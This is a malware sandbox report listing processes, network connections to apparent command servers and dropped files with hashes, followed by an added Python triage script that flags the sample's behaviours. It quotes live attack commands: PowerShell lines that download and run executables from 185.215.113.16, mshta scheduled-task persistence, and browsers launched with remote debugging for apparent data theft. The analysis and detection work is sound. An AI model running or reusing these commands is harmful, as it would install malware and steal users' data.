"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4876,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4784 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4944,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4864 /prefetch:8
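
Added example, not part of the sandbox output: a Python triage pass over the Processes list above. It pairs each image with its command line and flags what this sample does: the schtasks entries that re-run an HTA through mshta every 25 minutes, the PowerShell one-liners that fetch random.exe from 185.215.113.16 and start it, the Chrome and Edge launches with --remote-debugging-port (the "Uses browser remote debugging" signature; the DevTools endpoint on 127.0.0.1:9223 is what the loopback connections in the Network section are), the cmd.exe self-cleanup and the taskkill of firefox.exe. SAMPLE is a subset of the report's own entries in the report's own layout; the rule names and wording are this example's own. Note the first PowerShell line: $env:temp is concatenated with the file name without a backslash, so the payload lands at C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE, next to the Temp folder rather than inside it, which matches the path that appears later in the list; the download check reports that.

```python
"""Pair each image in the report's Processes list with its command line and flag
the behaviours this sample shows. Added example; not part of the sandbox report.
SAMPLE is a subset of the report's own Processes entries (image line, blank line,
command line, blank line); the rules and their wording are this example's own."""
import re

SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe

"C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 3U8Dqmawh4D /tr "mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "nLlCHmaz9jk" /tr "mshta \"C:\Temp\f71Q9b6DZ.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\2n790" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T
"""


def basename(path):
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def parse_processes(text):
    """The report lists each process as an image path followed by its command line."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    return list(zip(lines[0::2], lines[1::2]))


def check_schtasks(cmd):
    # /tr may carry escaped quotes inside the quoted action, as the second entry does
    m = re.search(r'schtasks\s+/create\b.*?/tn\s+"?([^\s"]+)"?.*?/tr\s+"(mshta(?:\\"|[^"])*)"'
                  r'.*?/sc\s+(\w+)\s+/mo\s+(\d+)', cmd, re.I)
    if m:
        task, action, unit, every = m.groups()
        return f"scheduled task {task} re-runs '{action}' every {every} {unit}(s)"


def check_download(cmd):
    m = re.search(r"\$env:temp\+'([^']+)'.*?DownloadFile\('([^']+)'.*?Start-Process", cmd, re.I)
    if m:
        name, url = m.groups()
        note = "" if name.startswith("\\") else " (no path separator: lands next to %TEMP%, not inside it)"
        return f"downloads {url} to %TEMP%{name} and runs it{note}"


def check_remote_debug(image, cmd):
    m = re.search(r"--remote-debugging-port=(\d+)", cmd)
    if m and "--type=" not in cmd:   # the top-level browser launch, not a child that inherited the flag
        return f"{basename(image)} launched with DevTools remote debugging on 127.0.0.1:{m.group(1)}"


def check_cleanup(cmd):
    m = re.search(r'timeout\s+/t\s+(\d+)\s*&\s*rd\s+/s\s+/q\s+"([^"]+)"', cmd, re.I)
    if m:
        return f"deletes {m.group(2)} after {m.group(1)}s (self-cleanup)"


def check_taskkill(cmd):
    m = re.search(r"taskkill\s+/F\s+/IM\s+(\S+)", cmd, re.I)
    if m:
        return f"force-kills {m.group(1)} (frees its profile files for reading)"


def triage(text):
    """(tag, image, detail) per rule hit; one command line can hit several rules."""
    findings = []
    for image, cmd in parse_processes(text):
        checks = (("persistence", check_schtasks(cmd)),
                  ("download_exec", check_download(cmd)),
                  ("browser_debug", check_remote_debug(image, cmd)),
                  ("cleanup", check_cleanup(cmd)),
                  ("kill_browser", check_taskkill(cmd)))
        findings += [(tag, basename(image), msg) for tag, msg in checks if msg]
    return findings


if __name__ == "__main__":
    for tag, image, msg in triage(SAMPLE):
        print(f"{tag:14} {image:15} {msg}")
```

The renderer and utility chrome.exe/msedge.exe children also carry --remote-debugging-port because they inherit it from the parent launch, so the browser rule only fires on the command line without a --type= switch; otherwise every child process would produce a duplicate finding.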

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
RU 185.215.113.43:80 185.215.113.43 tcp
RU 185.215.113.75:80 185.215.113.75 tcp
US 8.8.8.8:53 advertised.life udp
US 104.21.94.161:443 advertised.life tcp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 fua.4t.com udp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 2.23.210.75:80 e6.o.lencr.org tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
GB 142.250.187.202:443 ogads-pa.googleapis.com udp
GB 142.250.187.202:443 ogads-pa.googleapis.com tcp
DE 109.120.178.136:80 109.120.178.136 tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
US 8.8.8.8:53 clients2.google.com udp
GB 172.217.169.78:443 clients2.google.com udp
GB 172.217.169.78:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
DE 94.130.190.206:443 fua.4t.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 185.198.234.185:80 cobolrationumelawrtewarms.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 104.21.42.12:443 pirtyoffensiz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
NL 185.156.73.73:80 185.156.73.73 tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 investiigato.website udp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 104.21.94.161:443 advertised.life tcp
US 8.8.8.8:53 breakfasutwy.cyou udp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 importenptoc.com udp
US 8.8.8.8:53 voicesharped.com udp
US 8.8.8.8:53 inputrreparnt.com udp
US 8.8.8.8:53 torpdidebar.com udp
US 8.8.8.8:53 rebeldettern.com udp
US 8.8.8.8:53 actiothreaz.com udp
US 8.8.8.8:53 garulouscuto.com udp
US 8.8.8.8:53 breedertremnd.com udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 outlinedtrai.bet udp
US 104.21.38.27:443 outlinedtrai.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.42.12:443 pirtyoffensiz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 edcatiofireeu.shop udp
US 8.8.8.8:53 impolitewearr.biz udp
US 8.8.8.8:53 toppyneedus.biz udp
US 8.8.8.8:53 lightdeerysua.biz udp
US 8.8.8.8:53 suggestyuoz.biz udp
US 8.8.8.8:53 hoursuhouy.biz udp
US 8.8.8.8:53 mixedrecipew.biz udp
US 8.8.8.8:53 affordtempyo.biz udp
US 8.8.8.8:53 pleasedcfrown.biz udp
GB 104.82.234.109:443 steamcommunity.com tcp
DE 109.120.178.136:80 109.120.178.136 tcp
US 8.8.8.8:53 investiigato.website udp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 104.21.42.12:443 pirtyoffensiz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
RU 185.215.113.115:80 185.215.113.115 tcp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com udp
GB 142.250.187.202:443 ogads-pa.googleapis.com udp
GB 142.250.187.202:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 tcp
GB 172.217.169.78:443 udp
GB 172.217.169.78:443 tcp

Files

memory/3680-0-0x0000000000660000-0x0000000000B30000-memory.dmp

memory/3680-1-0x0000000077CF4000-0x0000000077CF6000-memory.dmp

memory/3680-2-0x0000000000661000-0x00000000006C9000-memory.dmp

memory/3680-3-0x0000000000660000-0x0000000000B30000-memory.dmp

memory/3680-4-0x0000000000660000-0x0000000000B30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 a3ec4b44e7677c12a76bf51f45480133
SHA1 15587b7a0420115e979461490689a79beca64118
SHA256 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2
SHA512 4d1dfb16076f0fd17c2d6a0bfe221af69dda9bf7e75f82a13f64e5bd732ff56e7f42b36864b0e07c3ae78bcb459124e700640e03ba0a416121ae7146ea4bf075

memory/3652-19-0x0000000000270000-0x0000000000740000-memory.dmp

memory/3680-16-0x0000000000661000-0x00000000006C9000-memory.dmp

memory/3680-15-0x0000000000660000-0x0000000000B30000-memory.dmp

memory/3652-20-0x0000000000270000-0x0000000000740000-memory.dmp

memory/3652-21-0x0000000000270000-0x0000000000740000-memory.dmp

memory/3652-22-0x0000000000270000-0x0000000000740000-memory.dmp

memory/3652-23-0x0000000000270000-0x0000000000740000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

MD5 515748a93ce7beb3f4416ec66ba8488e
SHA1 3ba2f1a56dcc91967361622c56b1ba545cda4325
SHA256 a09d49280077ed84d72c5b39977a67155f7bf1bc12615fecb6ec81a0aa2f92a6
SHA512 3ce752a103a11b4ef84e6531f4feebcd70f5dfde979e3952709a686fb03e67741d894037406fc23fc5ea3b506d650653a01f3ef48fd7b5a44f79e45c8eb96ffb

memory/3652-41-0x0000000000270000-0x0000000000740000-memory.dmp

memory/3652-42-0x0000000000270000-0x0000000000740000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

MD5 896dc9ae02a4b0cf429b4346a3990fae
SHA1 17f297bb4cf3acd07078fc5d73c1d6564a8c0710
SHA256 6498189cc01fc00d92663abc7f60c27326ba5f059f1b2c4f499ed2856722d8a2
SHA512 e642b273a2cc01a32cede4d3400a910825d89d117333e0a96488721636783b9065f081ace394af0c484be4e60ab5249b390e840aeaa4115920e976fbd632851c

memory/2672-58-0x0000000000140000-0x00000000001F0000-memory.dmp

memory/2672-59-0x0000000005060000-0x0000000005604000-memory.dmp

memory/2532-61-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2532-63-0x0000000000400000-0x000000000045F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

MD5 87da0483aefde76a5086c5b2ea14304f
SHA1 ae6b27aeaf487666c71b26397709004e65b09002
SHA256 33f44b2fa9a46ef2ce1d03303d8f959e070ba8a1109ad302b5461ad74ef99c4f
SHA512 ca28949636f5d32e161b81d993a22839d65aea050ba7f8452ca70b6a2c8fd7385adbb9f2e5ad7da8edd3956b9d222452d5b86684ff0c7f3e2dc86930820f65e4

memory/4420-78-0x0000000000400000-0x000000000086A000-memory.dmp

memory/1728-80-0x000001609E0E0000-0x000001609E1C0000-memory.dmp

memory/1728-81-0x000001609E1C0000-0x000001609E272000-memory.dmp

memory/1728-82-0x000001609E3B0000-0x000001609E3D2000-memory.dmp

memory/3652-89-0x0000000000270000-0x0000000000740000-memory.dmp

memory/1728-90-0x00007FF6551E0000-0x00007FF65569B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe

MD5 5b0bf9144e2661027c1621957b1ef278
SHA1 589efc0736ecc18d94e4dd8d353502e8d76738c4
SHA256 a4337bb42c32b5dd68fef60740164ec01ee3f94ecc8345f4d396eea82f96b21f
SHA512 e0b10ecfbd4e241a78653a05ed1b65f89fe4c25109fd1276d0091d834ee9e90d3f4c253b506ab508cfd81ba65214a0917d6fe902873ccc1f179fae57b6db2177

C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta

MD5 c9e49fd88e8ecea5cbee7d03b4293861
SHA1 35837984f21ebbb1198b0b7b002e2c0e4cdc3608
SHA256 5f3e1d37a3b860a6e9d00ae267eee53dab3253d9ad6bf1413ad2563d575e69f7
SHA512 64f7f52c5e99d1d9c63858ba251f2be883cb8755da3b9427201ebf2799eebffe50d485b7fa39a949d02b07caf1ecd5829eaf6515ba9142d01a4987d149b3738d

memory/2036-111-0x0000000004E80000-0x0000000004EB6000-memory.dmp

memory/2036-114-0x00000000054F0000-0x0000000005B18000-memory.dmp

memory/1728-113-0x000001609E500000-0x000001609E576000-memory.dmp

memory/1728-112-0x000001609E430000-0x000001609E480000-memory.dmp

memory/2036-115-0x0000000005470000-0x0000000005492000-memory.dmp

memory/2036-117-0x0000000005E30000-0x0000000005E96000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1nhxef2m.14d.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2036-116-0x0000000005D50000-0x0000000005DB6000-memory.dmp

memory/1728-127-0x000001609E3E0000-0x000001609E3FE000-memory.dmp

memory/2036-128-0x0000000005FA0000-0x00000000062F4000-memory.dmp

memory/2036-129-0x0000000006410000-0x000000000642E000-memory.dmp

memory/2036-130-0x0000000006440000-0x000000000648C000-memory.dmp

\??\pipe\crashpad_3848_SZFJSPXQGKOCNDBG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2036-140-0x0000000007B60000-0x00000000081DA000-memory.dmp

memory/2036-141-0x0000000006920000-0x000000000693A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd

MD5 189e4eefd73896e80f64b8ef8f73fef0
SHA1 efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512 be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/2036-176-0x0000000007900000-0x0000000007996000-memory.dmp

memory/2036-177-0x0000000007890000-0x00000000078B2000-memory.dmp

C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

memory/2244-188-0x0000000000320000-0x0000000000772000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 79edfcad204b58d0d253b6b07dd89666
SHA1 e0146db72f42ec2203e247f98b807f869b9e3b09
SHA256 7c55e876b26f82092dbdb2d1a2f72e5cd7ee8ed7d1321fafd8f82cb04d86911b
SHA512 9115af0f28ceef45a915a35076aaf29b8bf1fd13c3a892a328e91d0ecac4bcd532aefaf1b1e9f074e37667dfb859a4745a49fb3b96cfb62f5df118f65d2ebbdd

memory/2244-201-0x0000000000320000-0x0000000000772000-memory.dmp

memory/2244-202-0x0000000000320000-0x0000000000772000-memory.dmp

memory/4420-203-0x0000000000400000-0x000000000086A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 25604a2821749d30ca35877a7669dff9
SHA1 49c624275363c7b6768452db6868f8100aa967be
SHA256 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

memory/544-213-0x0000000005750000-0x0000000005AA4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2f9d7e4603622375a876763333b3c90
SHA1 ef0f78ac9b12160ee781630e137c4679b21f211c
SHA256 beda4c42cf4950c09a1f6f0d80d8377f50fb4ec03c38327667448c5bc30e18ee
SHA512 d3eb0501140d7c2f76fa1c1bf2eac6de679f2ab245f35b33af6d36fa9ede9dd3c3d48a27947f0efbc1b74b2d5f8f1c23ede6ed225ca8d397431c726835e3be45

memory/544-220-0x0000000005FD0000-0x000000000601C000-memory.dmp

memory/4420-222-0x0000000000400000-0x000000000086A000-memory.dmp

memory/1080-224-0x0000000005FB0000-0x0000000006304000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bbe1b153b6236459b044a6d7ea9eadb9
SHA1 933d0800358caf244ed2cd546bf21edb0c3ad864
SHA256 d0694392593ae0a0d6d3e2bc4bb3e91f6d852e09841f4b1fc9eba100a867dcc7
SHA512 b9bbfe590b424493affff1b231ec5239ec10b3b946d4f72d8d24dd612daf633026b6f6d7b68ab5d2b6cd063a5825ef7071c2fed908ccf6f1c87846c18d904c58

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

MD5 41e7a544f14c8eeda7675b6f8fc2f267
SHA1 98585d0462f44ace4216e00c0ae33f7b3606e0d4
SHA256 b5d4798fed8196e12260f2152245af80763fe877d807069d7f0ca08fd4ee6843
SHA512 6457c3a40dc56b82cf6eabb95d4591eab45aca0fff0bfeb03e20cc25a250b411cef072833bca7c1f58590bad4b10327bb364c1163896f0b2aaab6fde57a8e9ef

C:\Temp\f71Q9b6DZ.hta

MD5 16d76e35baeb05bc069a12dce9da83f9
SHA1 f419fd74265369666595c7ce7823ef75b40b2768
SHA256 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA512 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

memory/4416-253-0x0000000000440000-0x000000000076E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 805458c8ea4e1da2b176438c184c5b3b
SHA1 c7bb8950d70e57b773f7720a535d0df73b92ed18
SHA256 80b506911a8e1fff8f7e2a98b050302cd8a68703df811e1e98faaccfb4bf361b
SHA512 dcf1d11f7da1c86ae4e3ec8d141dadda289dd2ff1796ef9c7b1208ce7c83de566db551ca026b620e7007fe926a3aff5d042905bcc58082a21394a04df73a9cb8

memory/4504-264-0x00000000066E0000-0x000000000672C000-memory.dmp

memory/5268-277-0x00000000006D0000-0x00000000009FE000-memory.dmp

memory/4416-279-0x0000000000440000-0x000000000076E000-memory.dmp

memory/3652-276-0x0000000000270000-0x0000000000740000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

MD5 d433e1dc943e6ea29d67cf72d2f6fecd
SHA1 9964aa3e596d93673c4d84695dc94d6f1a9766cd
SHA256 a4c8487df15d27bad7699778b81dd6569c0b0e759bd0017f399b39cfa53bd1c5
SHA512 caab39684638d71e901b2915313c618baba27c015b0fc52c7503eb714dd4f9068bfadd30cd2d3e240ec925b003e9535e12ffdd5db3a610fcd056032ea925ca43

memory/5832-293-0x0000000000C80000-0x0000000000FA0000-memory.dmp

memory/5832-300-0x0000000000C80000-0x0000000000FA0000-memory.dmp

memory/2244-301-0x0000000000320000-0x0000000000772000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe

MD5 49a690607e1d76e6970b724c4fd22ec7
SHA1 4b670fc77c181e9afb3986729ee3b585bc460c3f
SHA256 0d7d5c2d601ffd78f5714d6149aef687e5edefcaf88bb9d2d529e69233220ef7
SHA512 54ae94f0bddeeef34e9c5cb1f9bebde49085807e0bb71015bac171ec9b73649ee85a799194ad9861da8221948e0e0e12d74346ad602d47e3d7781100f75d5f5b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f2b08db3d95297f259f5aabbc4c36579
SHA1 f5160d14e7046d541aee0c51c310b671e199f634
SHA256 a43c97e4f52c27219be115d0d63f8ff38f98fc60f8aab81136e068ba82929869
SHA512 3256d03196afe4fbe81ae359526e686684f5ef8ef03ce500c64a3a8a79c72b779deff71cf64c0ece7d21737ffc67062ec8114c3de5cafd7e8313bb0d08684c75

memory/5264-324-0x00000000002A0000-0x000000000059F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6cdd2d2aae57f38e1f6033a490d08b79
SHA1 a54cb1af38c825e74602b18fb1280371c8865871
SHA256 56e7dc53fb8968feac9775fc4e2f5474bab2d10d5f1a5db8037435694062fbff
SHA512 6cf1ccd4bc6ef53d91c64f152e90f2756f34999a9b9036dc3c4423ec33e0dcee840e754d5efac6715411751facbe78acc6229a2c849877589755f7f578ef949a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 31cccc6a981a52522ec21f8708c228a3
SHA1 2e5dde33968017e939bc60f0d28295bfdd561f83
SHA256 85d0f3071cf367813d9fa7c3b4df2e057513d286226b6f0f235dbdcee4214c29
SHA512 e3a34d1c9edf78b3a6563e1857d66fac52e64e692a403888cb0421d79e653e777c91356e0353658b70c5b0c6ebfd112ac68d2d8a1b2ab831393bb2492146d60b

memory/2244-347-0x0000000000320000-0x0000000000772000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091742001\9ca528ce6d.exe

MD5 1b7c22a214949975556626d7217e9a39
SHA1 d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512 ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

memory/5264-358-0x00000000002A0000-0x000000000059F000-memory.dmp

memory/4420-359-0x0000000000400000-0x000000000086A000-memory.dmp

memory/5268-362-0x00000000006D0000-0x00000000009FE000-memory.dmp

memory/5268-367-0x00000000006D0000-0x00000000009FE000-memory.dmp

memory/3652-366-0x0000000000270000-0x0000000000740000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe

MD5 cf6bd1302ab35c1275fedadbabde12fa
SHA1 0b8f58dd6cc533ae2ac26abf9eac849962cbfeb1
SHA256 14738b35a925299846ccbaaae1e5002ad3eb4b63af8d08f517a8f916c99902e7
SHA512 c29182f551fe1538eddbb3b1f946073db2feabcfbe23729fbf8d6f72d3079a38f746af9cfa4f6db68d31bed038105a76a3dd381ce70cde5d181ebada16cc1b04

memory/4928-392-0x0000000000C70000-0x00000000018B4000-memory.dmp

memory/4420-399-0x0000000000400000-0x000000000086A000-memory.dmp

memory/3652-400-0x0000000000270000-0x0000000000740000-memory.dmp

memory/5268-401-0x00000000006D0000-0x00000000009FE000-memory.dmp

memory/4928-402-0x0000000000C70000-0x00000000018B4000-memory.dmp

memory/4928-403-0x0000000000C70000-0x00000000018B4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe

MD5 639af76cb7333cbd609da5d52a6e195b
SHA1 a1c8a3e99f11c72f0dcdfd75b75d6dbe9f266483
SHA256 a6e9b84cd1cdf3312a57f425bce1a490195864c5fae5ba5b0873c729ebbe11a8
SHA512 67510ef5a9dfa0d1dbf38d87a8f7b92b1dcd9e3979fc4632a19830875c5a86fa7261f8d11e86b506ebf7621352dc69093fb1a0e3432aa25118a1d6240c66de51

memory/5980-413-0x0000000000270000-0x0000000000740000-memory.dmp

memory/4968-421-0x00000000007B0000-0x00000000011E8000-memory.dmp

memory/5980-423-0x0000000000270000-0x0000000000740000-memory.dmp

